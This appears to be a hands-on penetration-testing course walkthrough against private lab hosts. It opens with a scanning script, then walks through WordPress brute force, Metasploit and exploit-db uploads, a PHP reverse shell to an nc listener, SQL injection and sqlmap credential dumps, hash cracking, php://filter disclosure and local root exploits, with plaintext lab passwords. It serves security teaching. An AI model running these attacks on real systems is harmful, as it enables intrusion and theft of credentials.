3165cd /tmp
3166rm -rf customerAudit/
3167rm -rf NetworkAudit/
3168mkdir -p /tmp/NetworkAudit/discovered_services/
3169mkdir -p /tmp/NetworkAudit/scan/windows/
3170mkdir -p /tmp/NetworkAudit/scan/sunrpc/
3171mkdir -p /tmp/NetworkAudit/scan/ssh/
3172mkdir -p /tmp/NetworkAudit/scan/ftp/
3173mkdir -p /tmp/NetworkAudit/scan/http/
3174mkdir -p /tmp/NetworkAudit/scan/telnet/
3175mkdir -p /tmp/NetworkAudit/scan/pop3/
3176mkdir -p /tmp/NetworkAudit/scan/printers/
3177mkdir -p /tmp/NetworkAudit/scan/mssql_databases/
3178mkdir -p /tmp/NetworkAudit/scan/oracle_databases/
3179mkdir -p /tmp/NetworkAudit/scan/mysql_databases/
3180mkdir -p /tmp/NetworkAudit/scan/mongodb_databases/
3181
3182
3183#####################
3184# Download propecia #
3185#####################
3186file2="/bin/propecia"
3187if [ -f "$file2" ]
3188then
3189 echo "$file is installed."
3190 clear
3191else
3192 echo "$file not found."
3193 echo Installing propecia
3194 cd /tmp
3195 wget --no-check-certificate https://dl.packetstormsecurity.net/UNIX/scanners/propecia.c
3196 gcc propecia.c -o propecia
3197 cp propecia /bin
3198fi
3199
3200######################
3201# Find Windows Hosts #
3202######################
3203clear
3204echo "Scanning for windows hosts."
3205propecia 172.31.2 445 >> /tmp/NetworkAudit/discovered_services/windows_hosts
3206clear
3207echo "Done scanning for windows hosts. FTP is next."
3208
3209
3210##################
3211# Find FTP Hosts #
3212##################
3213echo "Scanning for hosts running FTP."
3214propecia 172.31.2 21 >> /tmp/NetworkAudit/discovered_services/ftp_hosts
3215clear
3216echo "Done scanning for FTP hosts. SSH is next."
3217
3218##################
3219# Find SSH Hosts #
3220##################
3221echo "Scanning for hosts running SSH."
3222propecia 172.31.2 22 >> /tmp/NetworkAudit/discovered_services/ssh_hosts
3223clear
3224echo "Done scanning for SSH hosts. POP3 is next."
3225
3226
3227###################
3228# Find POP3 Hosts #
3229###################
3230echo "Scanning for hosts running POP3."
3231propecia 172.31.2 110 >> /tmp/NetworkAudit/discovered_services/pop3_hosts
3232clear
3233echo "Done scanning for POP3 hosts. SunRPC is next."
3234
3235
3236#####################
3237# Find SunRPC Hosts #
3238#####################
3239echo "Scanning for hosts running SunRPC."
3240propecia 172.31.2 111 >> /tmp/NetworkAudit/discovered_services/sunrpc_hosts
3241clear
3242echo "Done scanning for SunRPC hosts. Telnet is next."
3243
3244
3245#####################
3246# Find Telnet Hosts #
3247#####################
3248echo "Scanning for hosts running Telnet."
3249propecia 172.31.2 23 >> /tmp/NetworkAudit/discovered_services/telnet_hosts
3250clear
3251echo "Done scanning for Telnet hosts. HTTP is next."
3252
3253
3254###################
3255# Find HTTP Hosts #
3256###################
3257echo "Scanning for hosts running HTTP"
3258propecia 172.31.2 80 >> /tmp/NetworkAudit/discovered_services/http_hosts
3259clear
3260echo "Done scanning for HTTP hosts. HTTPS hosts are next."
3261
3262
3263###################
3264# Find HTTPS Hosts #
3265###################
3266echo "Scanning for hosts running HTTP"
3267propecia 172.31.2 443 >> /tmp/NetworkAudit/discovered_services/https_hosts
3268clear
3269echo "Done scanning for HTTPS hosts. Databases are next."
3270
3271
3272##################
3273# Find Databases #
3274##################
3275echo "Scanning for hosts running MS SQL Server"
3276propecia 172.31.2 1433 >> /tmp/NetworkAudit/discovered_services/mssql_hosts
3277clear
3278
3279echo "Scanning for hosts running Oracle"
3280propecia 172.31.2 1521 >> /tmp/NetworkAudit/discovered_services/oracle_hosts
3281clear
3282
3283echo "Scanning for hosts running Postgres"
3284propecia 172.31.2 5432 >> /tmp/NetworkAudit/discovered_services/postgres_hosts
3285clear
3286
3287echo "Scanning for hosts running MongoDB"
3288propecia 172.31.2 27017 >> /tmp/NetworkAudit/discovered_services/mongodb_hosts
3289clear
3290
3291echo "Scanning for hosts running MySQL"
3292propecia 172.31.2 3306 >> /tmp/NetworkAudit/discovered_services/mysql_hosts
3293clear
3294echo "Done doing the host discovery. Moving on to nmap'ing each host discovered. Windows hosts are first."
3295
3296
3297###############################
3298# Ok, let's do the NMAP files #
3299###############################
3300clear
3301# Windows
3302for x in `cat /tmp/NetworkAudit/discovered_services/windows_hosts` ; do nmap -Pn -n --open -p445 --script=msrpc-enum,smb-enum-domains,smb-enum-groups,smb-enum-processes,smb-enum-sessions,smb-enum-shares,smb-enum-users,smb-mbenum,smb-os-discovery,smb-security-mode,smb-server-stats,smb-system-info,smbv2-enabled,stuxnet-detect $x > /tmp/NetworkAudit/scan/windows/$x ; done
3303echo "Done with Windows."
3304
3305clear
3306# FTP
3307for x in `cat /tmp/NetworkAudit/discovered_services/ftp_hosts` ; do nmap -Pn -n --open -p21 --script=banner,ftp-anon,ftp-bounce,ftp-proftpd-backdoor,ftp-vsftpd-backdoor $x > /tmp/NetworkAudit/scan/ftp/$x ; done
3308echo "Done with FTP."
3309
3310clear
3311# SSH
3312for x in `cat /tmp/NetworkAudit/discovered_services/ssh_hosts` ; do nmap -Pn -n --open -p22 --script=sshv1,ssh2-enum-algos $x > /tmp/NetworkAudit/scan/ssh/$x ; done
3313echo "Done with SSH."
3314
3315clear
3316# SUNRPC
3317for x in `cat /tmp/NetworkAudit/discovered_services/sunrpc_hosts` ; do nmap -Pn -n --open -p111 --script=nfs-ls,nfs-showmount,nfs-statfs,rpcinfo $x > /tmp/NetworkAudit/scan/sunrpc/$x ; done
3318echo "Done with SunRPC."
3319
3320clear
3321# POP3
3322for x in `cat /tmp/NetworkAudit/discovered_services/pop3_hosts` ; do nmap -Pn -n --open -p110 --script=banner,pop3-capabilities,pop3-ntlm-info,ssl*,tls-nextprotoneg $x > /tmp/NetworkAudit/scan/pop3/$x ; done
3323echo "Done with POP3."
3324
3325# clear
3326# HTTP Fix this...maybe use https://github.com/jmortega/europython_ethical_hacking/blob/master/NmapScannerAsync.py
3327# as a good reference for what nmap nse scripts to run against port 80 and 443
3328# for x in `cat /tmp/NetworkAudit/discovered_services/http_hosts` ; do nmap -sV -O --script-args=unsafe=1 --script-args=unsafe --script "auth,brute,discovery,exploit,external,fuzzer,intrusive,malware,safe,version,vuln and not(http-slowloris or http-brute or http-enum or http-form-fuzzer)" $x > /tmp/NetworkAudit/scan/http/$x ; done
3329# echo "Done with HTTP."
3330
3331
3332# clear
3333# HTTP Fix this...maybe use https://github.com/jmortega/europython_ethical_hacking/blob/master/NmapScannerAsync.py
3334# as a good reference for what nmap nse scripts to run against port 80 and 443
3335# for x in `cat /tmp/NetworkAudit/discovered_services/https_hosts` ; do nmap -sV -O --script-args=unsafe=1 --script-args=unsafe --script "auth,brute,discovery,exploit,external,fuzzer,intrusive,malware,safe,version,vuln and not(http-slowloris or http-brute or http-enum or http-form-fuzzer)" $x > /tmp/NetworkAudit/scan/http/$x ; done
3336# echo "Done with HTTP."
3337
3338
3339clear
3340# SQL Servers
3341for x in `cat /tmp/NetworkAudit/discovered_services/mssql_hosts` ; do -Pn -n --open -p1433 --script=ms-sql-dump-hashes,ms-sql-empty-password,ms-sql-info $x > /tmp/NetworkAudit/scan/mssql_databases/$x ; done
3342echo "Done with MS SQL."
3343
3344clear
3345# Oracle Servers
3346# FIX THIS: needs brute force wordlists for this to run correctly
3347# for x in `cat /tmp/NetworkAudit/discovered_services/oracle_hosts` ; do nmap -Pn -n --open -p1521 --script=oracle-sid-brute --script oracle-enum-users --script-args oracle-enum-users.sid=ORCL,userdb=orausers.txt $x >> /tmp/NetworkAudit/scan/oracle_databases/$x ; done
3348# echo "Done with Oracle."
3349
3350clear
3351# MongoDB
3352for x in `cat /tmp/NetworkAudit/discovered_services/mongodb_hosts` ; do nmap -Pn -n --open -p27017 --script=mongodb-databases,mongodb-info $x > /tmp/NetworkAudit/scan/mongodb_databases/$x ; done
3353echo "Done with MongoDB."
3354
3355
3356clear
3357# MySQL Servers
3358for x in `cat /tmp/NetworkAudit/discovered_services/mysql_hosts` ; do nmap -Pn -n --open -p3306 --script=mysql-databases,mysql-empty-password,mysql-info,mysql-users,mysql-variables $x >> /tmp/NetworkAudit/scan/mysql_databases/$x ; done
3359echo "Done with MySQL."
3360
3361
3362# Add postgres nse scripts
3363# References:
3364# https://nmap.org/nsedoc/lib/pgsql.html
3365# https://nmap.org/nsedoc/scripts/pgsql-brute.html
3366#
3367
3368echo " "
3369echo " "
3370sleep 1
3371clear
3372echo "Done, now check your results."
3373sleep 2
3374clear
3375cd /tmp/NetworkAudit/scan/
3376ls
3377
3378
3379
3380----------------------------------------------------------------------------------------------------------------------------
3381-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
3382-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
3383--------------------------------------------------------------------------------------
3384
3385 ######################################
3386----------- ############### # Day 2: Attacking Hosts in the lab ################ -----------
3387 ######################################
3388
3389######################
3390# Attacking Minotaur #
3391######################
3392
3393Step 1: Portscan/Bannergrab the target host
3394---------------------------Type This-----------------------------------
3395sudo nmap -sV 172.31.2.117
3396-----------------------------------------------------------------------
3397
3398
3399
3400Step 2: Vulnerability scan the web server
3401---------------------------Type This-----------------------------------
3402cd /home/hacklab/toolz/Nikto2/program
3403perl nikto.pl -h 172.31.2.117
3404-----------------------------------------------------------------------
3405
3406
3407
3408Step 3: Directory brute-force the webserver
3409---------------------------Type This-----------------------------------
3410cd /home/hacklab/toolz/dirb
3411./dirb http://172.31.2.117 /usr/share/dirb/wordlists/big.txt
3412-----------------------------------------------------------------------
3413
3414### dirb output ###
3415==> DIRECTORY: http://172.31.2.117/bull/
3416-----------------------------------------------------------------------
3417
3418
3419Step 4: Run wordpress vulnerability scanner
3420---------------------------Type This-----------------------------------
3421wpscan --url 172.31.2.117/bull/ -r --enumerate u --enumerate p --enumerate t --enumerate tt
3422
3423
3424cewl -w words.txt http://172.31.2.117/bull/
3425
3426
3427cewl http://172.31.2.117/bull/ -d 1 -m 6 -w whateverbro.txt
3428
3429wc -l whateverbro.txt
3430
3431john --wordlist=whateverbro.txt --rules --stdout > words-john.txt
3432
3433wc -l words-john.txt
3434
3435wpscan --username bully --url http://172.31.2.117/bull/ --wordlist words-john.txt --threads 10
3436-----------------------------------------------------------------------
3437
3438
3439
3440
3441
3442Step 5: Attack vulnerable Wordpress plugin with Metasploit (just doing the exact same attack with MSF)
3443---------------------------Type This-----------------------------------
3444msfconsole
3445
3446use exploit/unix/webapp/wp_slideshowgallery_upload
3447
3448set RHOST 172.31.2.117
3449
3450set RPORT 80
3451
3452set TARGETURI /bull
3453
3454set WP_USER bully
3455
3456set WP_PASSWORD Bighornedbulls
3457
3458exploit
3459-----------------------------------------------------------------------
3460
3461Damn...that didn't work...Can't reverse shell from inside the network to a host in the VPN network range.
3462This is a lab limitation that I implemented to stop students from compromising hosts in the lab network
3463and then from the lab network attacking other students.
3464
3465
3466---------------------------Type This-----------------------------------
3467wget http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
3468
3469tar -zxvf php-reverse-shell-1.0.tar.gz
3470
3471cd ~/toolz/php-reverse-shell-1.0/
3472
3473nano php-reverse-shell.php
3474-----------------------------------------------------------------------
3475 ***** change the $ip and $port variables to a host that you have already compromised in the network
3476 ***** for this example I chose 172.31.2.64 and kept port 1234
3477
3478
3479---------------------------Type This-----------------------------------
3480chmod 777 php-reverse-shell.php
3481cp php-reverse-shell.php ..
3482-----------------------------------------------------------------------
3483
3484
3485
3486Browse to this link https://www.exploit-db.com/raw/34681/ and copy all of the text from it.
3487Paste the contents of this link into a file called wp_gallery_slideshow_146_suv.py
3488--------------------------Type This-----------------------------------
3489python wp_gallery_slideshow_146_suv.py -t http://172.31.2.117/bull/ -u bully -p Bighornedbulls -f php-reverse-shell.php
3490
3491-----------------------------------------------------------------------
3492
3493
3494
3495Set up netcat listener on previously compromised host
3496---------------------------Type This-----------------------------------
3497ssh -l webmin 172.31.2.64
3498 webmin1980
3499
3500
3501nc -lvp 1234
3502-----------------------------------------------------------------------
3503
3504
3505
3506
3507---------------------Type This in your browser ------------------------
3508http://172.31.2.117/bull//wp-content/uploads/slideshow-gallery/php-reverse-shell.php
3509-----------------------------------------------------------------------
3510
3511
3512Now check your listener to see if you got the connection
3513---------------------------Type This-----------------------------------
3514id
3515
3516/sbin/ifconfig
3517
3518python -c 'import pty;pty.spawn("/bin/bash")'
3519
3520---------------------------Type This-----------------------------------
3521cd /tmp
3522cat >> exploit2.c << out
3523-----------------------------------------------------------------------
3524**************paste in the content from here *****************
3525https://www.exploit-db.com/raw/37292/
3526
3527**************hit enter a few times *****************
3528
3529---------------------------Type This-----------------------------------
3530out
3531
3532
3533gcc -o boom2 exploit2.c
3534
3535./boom2
3536
3537id
3538-----------------------------------------------------------------------
3539
3540
3541
3542
3543---------------------------Type This-----------------------------------
3544sudo nmap -sV 172.31.2.181
3545-----------------------------------------------------------------------
3546PORT STATE SERVICE VERSION
354722/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
3548
3549
3550---------------------------Type This-----------------------------------
3551sudo nmap -sU -p69,161 172.31.2.181
3552-----------------------------------------------------------------------
3553PORT STATE SERVICE
355469/udp closed tftp
3555161/udp open snmp
3556
3557
3558---------------------------Type This-----------------------------------
3559sudo apt-get -y install onesixtyone snmp
3560
3561wget https://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/wordlists-misc/wordlist-common-snmp-community-strings.txt
3562
3563onesixtyone -c wordlist-common-snmp-community-strings.txt 172.31.2.181
3564----------------------------------------------------------------------
3565Gives error "Community string too long". A little bit of google and I found this reference: https://github.com/trailofbits/onesixtyone/issues/1
3566
3567---------------------------Type This-----------------------------------
3568cat wordlist-common-snmp-community-strings.txt | grep -v TENmanUFactOryPOWER > snmp-community-strings.txt
3569
3570onesixtyone -c snmp-community-strings.txt 172.31.2.181
3571
3572snmpwalk -Os -c public -v 1 172.31.2.181
3573---------------------------------------------------------------------
3574
3575Username "eric" found in snmpwalk, and the string "There is a house in New Orleans they call it..."
3576
3577Google the sentence, and I find out that the whole sentence is “There is a house in New Orleans they call it the rising sun”.
3578
3579Try to SSH to the box using the credentials eric:therisingsun
3580
3581
3582---------------------------Type This-----------------------------------
3583ssh -l eric 172.31.2.181
3584 therisingsun
3585
3586id
3587cat /etc/issue
3588uname -a
3589cat /etc/*release
3590
3591---------------------------Type This-----------------------------------
3592cat >> exploit.c << out
3593
3594**************paste in the content from here *****************
3595https://www.exploit-db.com/raw/39166/
3596
3597
3598------ hit enter a few times ------
3599
3600------ then type 'out' ----- this closes the file handle...
3601
3602
3603
3604---------------------------Type This-----------------------------------
3605gcc -o boom exploit.c
3606
3607./boom
3608
3609id
3610
3611
3612......YEAH - do the happy dance!!!!
3613
3614
3615
3616How to go after 172.31.2.238
3617Reference: https://t0w3ntum.com/2017/01/07/baffle/
3618
3619
3620---------------------------------------------------------------
3621sudo nmap -sV -p 3260 172.31.2.217
3622
3623
3624sudo apt install open-iscsi
3625
3626sudo iscsiadm -m discovery -t st -p 172.31.2.217
3627
3628sudo iscsiadm -m discovery -t st -p 172.31.2.217:3260
3629
3630sudo iscsiadm -m node -p 172.31.2.217 --login
3631
3632sudo /bin/bash
3633
3634fdisk -l
3635 ***** look for /dev/sda5 - Linux swap / Solaris *******
3636
3637mkdir /mnt/217vm
3638
3639mount /dev/sdb /mnt/217vm
3640
3641cd /mnt/217vm
3642
3643ls
3644
3645cat flag1.txt
3646
3647file bobsdisk.dsk
3648
3649mkdir /media/bobsdisk
3650
3651mount /mnt/217vm/bobsdisk.dsk /media/bobsdisk
3652
3653/mnt/217vm# ls
3654
3655cd /media/bobsdisk/
3656
3657ls
3658
3659cat ToAlice.eml
3660
3661file bobsdisk.dsk
3662
3663mkdir /media/bobsdisk
3664
3665mount /mnt/217vm/bobsdisk.dsk /media/bobsdisk
3666
3667/mnt/217vm# ls
3668
3669cd /media/bobsdisk/
3670
3671ls
3672
3673cat ToAlice.eml
3674
3675file ToAlice.csv.enc
3676
3677file bobsdisk.dsk
3678
3679pwd
3680
3681mkdir /media/bobsdisk
3682
3683
3684mount /mnt/217vm/bobsdisk.dsk /media/bobsdisk
3685
3686ls
3687
3688cd /media/bobsdisk/
3689
3690ls
3691
3692openssl enc -aes-256-cbc -d -md sha256 -in ToAlice.csv.enc -out ToAlice.csv
3693
3694ls
3695
3696cat ToAlice.eml | grep flag
3697
3698openssl enc -aes-256-cbc -d -md sha256 -in ToAlice.csv.enc -out ToAlice.csv
3699
3700ls
3701
3702cat ToAlice.eml
3703 ***** look for supercalifragilisticoespialidoso ******
3704
3705openssl enc -aes-256-cbc -d -md sha256 -in ToAlice.csv.enc -out ToAlice.csv
3706
3707 supercalifragilisticoespialidoso
3708
3709
3710ls
3711
3712cat ToAlice.csv
3713
3714-----------------------------------------------------
3715Web Path,Reason
37165560a1468022758dba5e92ac8f2353c0,Black hoodie. Definitely a hacker site!
3717c2444910794e037ebd8aaf257178c90b,Nice clean well prepped site. Nothing of interest here.
3718flag3{2cce194f49c6e423967b7f72316f48c5caf46e84},The strangest URL I've seen? What is it?
3719
3720-----------------------------------------------------
3721
3722The hints are "Web Path" and "strangest URL" so let's try the long strings in the URL:
3723http://172.31.2.217/5560a1468022758dba5e92ac8f2353c0/
3724 -- view source
3725
3726Found this string in the source:
3727R2VvcmdlIENvc3RhbnphOiBbU291cCBOYXppIGdpdmVzIGhpbSBhIGxvb2tdIE1lZGl1bSB0dXJr
3728ZXkgY2hpbGkuIApbaW5zdGFudGx5IG1vdmVzIHRvIHRoZSBjYXNoaWVyXSAKSmVycnkgU2VpbmZl
3729bGQ6IE1lZGl1bSBjcmFiIGJpc3F1ZS4gCkdlb3JnZSBDb3N0YW56YTogW2xvb2tzIGluIGhpcyBi
3730YWcgYW5kIG5vdGljZXMgbm8gYnJlYWQgaW4gaXRdIEkgZGlkbid0IGdldCBhbnkgYnJlYWQuIApK
3731ZXJyeSBTZWluZmVsZDogSnVzdCBmb3JnZXQgaXQuIExldCBpdCBnby4gCkdlb3JnZSBDb3N0YW56
3732YTogVW0sIGV4Y3VzZSBtZSwgSSAtIEkgdGhpbmsgeW91IGZvcmdvdCBteSBicmVhZC4gClNvdXAg
3733TmF6aTogQnJlYWQsICQyIGV4dHJhLiAKR2VvcmdlIENvc3RhbnphOiAkMj8gQnV0IGV2ZXJ5b25l
3734IGluIGZyb250IG9mIG1lIGdvdCBmcmVlIGJyZWFkLiAKU291cCBOYXppOiBZb3Ugd2FudCBicmVh
3735ZD8gCkdlb3JnZSBDb3N0YW56YTogWWVzLCBwbGVhc2UuIApTb3VwIE5hemk6ICQzISAKR2Vvcmdl
3736IENvc3RhbnphOiBXaGF0PyAKU291cCBOYXppOiBOTyBGTEFHIEZPUiBZT1UK
3737
3738------ https://www.base64decode.org/ -------
3739------ Decoded, but didn't find a flag -----
3740
3741
3742http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/
3743 -- view source --
3744 -- Nothing in source --
3745
3746Browsed to the flag link:
3747view-source:http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=flag
3748 -- view source --
3749 -- Nothing in source --
3750
3751
3752Tried a PHP base64 decode with the URL:
3753http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=welcome.php
3754http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=flag.php
3755http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=party.php
3756
3757------ https://www.base64decode.org/ -------
3758Use the string found here:
3759http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=flag.php
3760
3761-------------------------------------------------------------------
3762PD9waHAKZGVmaW5lZCAoJ1ZJQUlOREVYJykgb3IgZGllKCdPb29vaCEgU28gY2xvc2UuLicpOwo/Pgo8aDE+RmxhZzwvaDE+CjxwPkhtbS4gTG9va2luZyBmb3IgYSBmbGFnPyBDb21lIG9uLi4uIEkgaGF2ZW4ndCBtYWRlIGl0IGVhc3kgeWV0LCBkaWQgeW91IHRoaW5rIEkgd2FzIGdvaW5nIHRvIHRoaXMgdGltZT88L3A+CjxpbWcgc3JjPSJ0cm9sbGZhY2UucG5nIiAvPgo8P3BocAovLyBPaywgb2suIEhlcmUncyB5b3VyIGZsYWchIAovLwovLyBmbGFnNHs0ZTQ0ZGIwZjFlZGMzYzM2MWRiZjU0ZWFmNGRmNDAzNTJkYjkxZjhifQovLyAKLy8gV2VsbCBkb25lLCB5b3UncmUgZG9pbmcgZ3JlYXQgc28gZmFyIQovLyBOZXh0IHN0ZXAuIFNIRUxMIQovLwovLyAKLy8gT2guIFRoYXQgZmxhZyBhYm92ZT8gWW91J3JlIGdvbm5hIG5lZWQgaXQuLi4gCj8+Cg==
3763-------------------------------------------------------------------
3764<?php
3765defined ('VIAINDEX') or die('Ooooh! So close..');
3766?>
3767<h1>Flag</h1>
3768<p>Hmm. Looking for a flag? Come on... I haven't made it easy yet, did you think I was going to this time?</p>
3769<img src="trollface.png" />
3770<?php
3771// Ok, ok. Here's your flag!
3772//
3773// flag4{4e44db0f1edc3c361dbf54eaf4df40352db91f8b}
3774//
3775// Well done, you're doing great so far!
3776// Next step. SHELL!
3777//
3778//
3779// Oh. That flag above? You're gonna need it...
3780?>
3781
3782
3783
3784
3785
3786============================================ Attacking another server because I need a reverse shell =========================================
3787---------------------------------------------------------------------------------------------------------------------------------------------------------
3788
3789Attack steps:
3790-------------
3791
3792
3793
3794Step 1: Ping sweep the target network
3795-------------------------------------
3796
3797
3798---------------------------Type This-----------------------------------
3799nmap -sP 172.31.2.0/24
3800-----------------------------------------------------------------------
3801
3802
3803
3804- Found 3 hosts
3805172.31.2.64
3806172.31.2.217
3807172.31.2.238
3808
3809
3810
3811Step 2: Port scan target system
3812-------------------------------
3813
3814
3815---------------------------Type This-----------------------------------
3816nmap -sV 172.31.2.64
3817-----------------------------------------------------------------------
3818
3819
3820
3821-------------Scan Results--------------------------------------------
3822PORT STATE SERVICE VERSION
382322/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
382480/tcp open http Apache httpd 2.4.7 ((Ubuntu))
3825514/tcp filtered shell
38261037/tcp filtered ams
38276667/tcp open irc ngircd
3828Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel
3829--------------------------------------------------------------------
3830
3831
3832Step 3: Vulnerability Scan the webserver
3833----------------------------------------
3834
3835
3836---------------------------Type This-----------------------------------
3837cd ~/toolz/
3838
3839rm -rf nikto*
3840
3841git clone https://github.com/sullo/nikto.git Nikto2
3842
3843cd Nikto2/program
3844
3845perl nikto.pl -h 172.31.2.64
3846-----------------------------------------------------------------------
3847
3848
3849Step 4: Run dirbuster or similar directory bruteforce tool against the target
3850-----------------------------------------------------------------------------
3851
3852
3853---------------------------Type This-----------------------------------
3854wget https://dl.packetstormsecurity.net/UNIX/cgi-scanners/Webr00t.pl
3855
3856perl Webr00t.pl -h 172.31.2.64 -v
3857-----------------------------------------------------------------------
3858 or with dirbuster (dirb)
3859
3860---------------------------Type This-----------------------------------
3861git clone https://github.com/v0re/dirb.git
3862
3863cd dirb/
3864
3865./configure
3866
3867make
3868
3869dirb
3870
3871./dirb http://172.31.2.64 wordlists/big.txt
3872-----------------------------------------------------------------------
3873
3874
3875
3876Step 5: Browse the web site to look for clues
3877---------------------------------------------
3878Since no glaring vulnerabilities were found with the scanner - we start just looking around the website itself
3879
3880
3881..... really didn't get much from here so we just opened the web page in a browser
3882http://172.31.2.64/
3883
3884.....browsed to the webpage and saw that it pointed to:
3885http://172.31.2.64/jabc
3886
3887....clicked on documentation link and found hidden text that pointed to here:
3888http://172.31.2.64/jabcd0cs/
3889
3890....saw that the app was OpenDocMan v1.2.7 and found it was vulnerable:
3891https://www.exploit-db.com/exploits/32075/
3892
3893Tried the sql injection described in exploit-db:
3894http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,version(),3,4,5,6,7,8,9
3895
3896http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,user(),3,4,5,6,7,8,9
3897
3898
3899
3900Tried to run sqlmap against the target
3901
3902
3903---------------------------Type This-----------------------------------
3904cd sqlmap-dev/
3905python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -b --dbms=mysql
3906
3907python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --current-user --dbms=mysql
3908
3909python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --current-db --dbms=mysql
3910
3911python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --dbs --dbms=mysql
3912
3913python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --users --passwords --dbms=mysql
3914-----------------------------------------------------------------------
3915
3916
3917
3918FOUND: cracked password 'toor' for user 'drupal7' (sqlmap)
3919FOUND: 9CFBBC772F3F6C106020035386DA5BBBF1249A11 hash is 'toor' verified at crackstation.net
3920
3921
3922
3923---------------------------Type This-----------------------------------
3924python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -D jabcd0cs --tables --dbms=mysql
3925
3926python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -D jabcd0cs -T odm_user --dump --dbms=mysql
3927-----------------------------------------------------------------------
3928
3929 username: webmin
3930 hash: b78aae356709f8c31118ea613980954b
3931
3932https://hashkiller.co.uk/md5-decrypter.aspx
3933
3934 hash: b78aae356709f8c31118ea613980954b
3935 pass: webmin1980
3936
3937
3938ok - /phpmyadmin and /webmin both did not work in the browser but these credentials worked for SSH.
3939
3940
3941
3942---------------------------Type This-----------------------------------
3943ssh -l webmin 172.31.2.64
3944 webmin1980
3945
3946id
3947
3948cat /etc/*release
3949-----------------------------------------------------------------------
3950
3951
3952
3953....tired of not having a real command shell...
3954
3955
3956---------------------------Type This-----------------------------------
3957python -c 'import pty;pty.spawn("/bin/bash")'
3958
3959
3960cd /tmp
3961
3962pwd
3963
3964
3965cat >> exploit.c << out
3966
3967**************paste in the content from here *****************
3968https://www.exploit-db.com/raw/39166/
3969
3970
3971------ hit enter a few times ------
3972
3973------ then type 'out' ----- this closes the file handle...
3974
3975
3976
3977---------------------------Type This-----------------------------------
3978gcc -o boom exploit.c
3979
3980./boom
3981-----------------------------------------------------------------------
3982
3983
3984------------exploit failed, damn let's try another one ---------
3985
3986
3987
3988---------------------------Type This-----------------------------------
3989cat >> exploit2.c << out
3990
3991**************paste in the content from here *****************
3992https://www.exploit-db.com/raw/37292/
3993
3994
3995out
3996
3997
3998gcc -o boom2 exploit2.c
3999
4000./boom2
4001
4002id
4003
4004
4005......YEAH - do the happy dance!!!!
4006=============================================== Now back to the previous server ==============================================================